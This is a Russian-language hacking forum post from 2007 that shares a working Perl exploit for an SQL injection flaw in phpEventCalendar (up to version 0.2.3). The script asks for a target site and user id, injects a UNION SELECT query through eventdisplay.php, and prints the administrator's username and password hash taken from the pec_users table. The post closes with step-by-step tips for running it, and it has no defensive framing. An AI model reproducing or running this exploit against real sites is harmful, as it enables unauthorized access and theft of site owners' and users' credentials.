SITE LOGO Суббота
2024-06-29
9:06 AM
Приветствую Вас Гость | RSS Главная страница | Цель: phpEventCalendar 0.2.2 - XAKA_FORUM | Регистрация | Вход
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
XAKA_FORUM » Эксплойты » Новые эксплойты » Цель: phpEventCalendar 0.2.2
Цель: phpEventCalendar 0.2.2
minkoДата: Среда, 2007-07-04, 11:07 PM | Сообщение # 1
Рядовой
Группа: Пользователи
Сообщений: 6
Репутация: 0
Статус: Offline
Воздействие: SQL-инъекция
код:
#!/usr/bin/perl
#
# Vendor url: www.ikemcg.com
#
require LWP::UserAgent;

print "#
# phpEventCalendar <= v0.2.3 SQL Injection Exploit
# By Iron - ironwarez.info
# Thanks to Silentz for the help smile
# Greets to everyone at RootShell Security Group & dHack
#
# Example target url: http://www.target.com/phpeventcalendar/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "User id to retrieve name/password from? (1 = admin)";
chomp($target_id=<stdin>);
$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id;

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->get($target);

if ($response->is_success)
{
if($response->content =~ /<span class="display_header">(.*)<\/span>/i)
{
($username,$password) = split(/,/,$1);
print "Username: ".$username;
print "\nPassword: ".$password;
}
else
{
print "\nUnable to retrieve username/password.";
}
}
else
{
die "Error: ".$response->status_line;
}

=================================================================================================
для тех кто не знаєт как юзать експлойт(хотя не думаю что єсть такие...)
качаєте active perl ЗдеСЬ
потом копируете код в текстовой файл и сохраняете с розширением .pl! smile

 
XAKA_FORUM » Эксплойты » Новые эксплойты » Цель: phpEventCalendar 0.2.2
  • Страница 1 из 1
  • 1
Поиск:


Copyright MyCorp © 2006 Используются технологии uCoz